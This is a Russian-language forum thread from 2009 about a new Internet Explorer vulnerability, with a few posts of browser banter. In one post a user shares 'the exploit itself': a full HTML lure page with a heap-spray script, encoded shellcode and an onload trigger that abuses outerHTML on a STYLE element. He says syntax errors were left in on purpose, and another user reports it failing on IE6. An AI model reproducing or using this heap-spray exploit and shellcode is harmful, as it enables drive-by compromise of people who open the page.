В Internet Explorer обнаружена новая уязвимость

Discussion in 'Мировые новости. Обсуждения.' started by hafiz, 23 Nov 2009.

  1. GamePr0graameR

    GamePr0graameR New Member

    Joined:
    23 Nov 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    vvs777, а какой у вас сайт? Там домохозяек много? :) Все, кто не домохозяйки уже давно перешли на Firefox. А самые продвинутые - на оперу :)
     
  2. 043nKRuT0y

    043nKRuT0y Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    226
    Likes Received:
    8
    Reputations:
    0
    Собственно сам сплоит (Стандартный документ куда нужно заманить наивного юзверя) :
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <HTML xmlns="http://www.w3.org/1999/xhtml">
         <HEAD>
    <script>
                 function load(){
                     var e;
                     e=document.getElementsByTagName("STYLE")[0];
                     e.outerHTML="1";
                 }
             </script>
             <STYLE type="text/css">
                 body{ overflow: scroll; margin: 0; }
             </style>
             
             <SCRIPT language="javascript">
    var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    memory = new Array();
    for (x=0; x<4000; x++) memory[x] = block + shellcode;
    </script>
      
         </HEAD>
         <BODY onload="load()">
         </BODY>
    </HTML>
    Допущены синтаксические ошибки - видимо как защита от детей ...
     
  3. GamePr0graameR

    GamePr0graameR New Member

    Joined:
    23 Nov 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Обнаружена новая опасность для Internet Explorer
    Найдена новая уязвимость в Internet Explorer
    В Internet Explorer новая уязвимость
    Обнаружена уязвимость в Internet Explorer 7
    В Internet Explorer - новая уязвимость

    Млин... решето а не браузер
    З.Ы Это из "похожих тем"
     
  4. Psi.X

    Psi.X New Member

    Joined:
    12 Apr 2009
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    043nKRuT0y
    Авот *** это сплоит - на 6м ноль эффекта.
    Походу это с секлаба, больше нигде не видел инфы....
     
  5. Adekvatnyj

    Adekvatnyj Member

    Joined:
    28 Oct 2009
    Messages:
    18
    Likes Received:
    25
    Reputations:
    -3
    Да что вы говорите! By Firefox people штоли напечатано?
     
Loading...